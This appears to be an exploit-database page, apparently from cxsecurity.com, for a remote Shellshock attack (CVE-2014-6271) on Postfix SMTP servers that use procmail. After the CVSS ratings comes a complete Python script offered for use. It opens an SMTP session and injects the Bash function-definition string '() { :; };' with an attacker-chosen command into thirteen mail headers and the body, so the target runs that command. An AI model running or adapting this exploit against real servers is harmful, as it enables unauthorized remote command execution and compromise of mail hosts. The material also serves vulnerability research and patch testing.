Postfix SMTP Shellshock

2014.10.07
Credit: fattymcwopr
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/bin/python # Exploit Title: Shellshock SMTP Exploit # Date: 10/3/2014 # Exploit Author: fattymcwopr # Vendor Homepage: gnu.org # Software Link: http://ftp.gnu.org/gnu/bash/ # Version: 4.2.x < 4.2.48 # Tested on: Debian 7 (postfix smtp server w/procmail) # CVE : 2014-6271 from socket import * import sys def usage(): print "shellshock_smtp.py <target> <command>" argc = len(sys.argv) if(argc < 3 or argc > 3): usage() sys.exit(0) rport = 25 rhost = sys.argv[1] cmd = sys.argv[2] headers = ([ "To", "References", "Cc", "Bcc", "From", "Subject", "Date", "Message-ID", "Comments", "Keywords", "Resent-Date", "Resent-From", "Resent-Sender" ]) s = socket(AF_INET, SOCK_STREAM) s.connect((rhost, rport)) # banner grab s.recv(2048*4) def netFormat(d): d += "\n" return d.encode('hex').decode('hex') data = netFormat("mail from:<>") s.send(data) s.recv(2048*4) data = netFormat("rcpt to:<nobody>") s.send(data) s.recv(2048*4) data = netFormat("data") s.send(data) s.recv(2048*4) data = '' for h in headers: data += netFormat(h + ":() { :; };" + cmd) data += netFormat(cmd) # <CR><LF>.<CR><LF> data += "0d0a2e0d0a".decode('hex') s.send(data) s.recv(2048*4) data = netFormat("quit") s.send(data) s.recv(2048*4)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top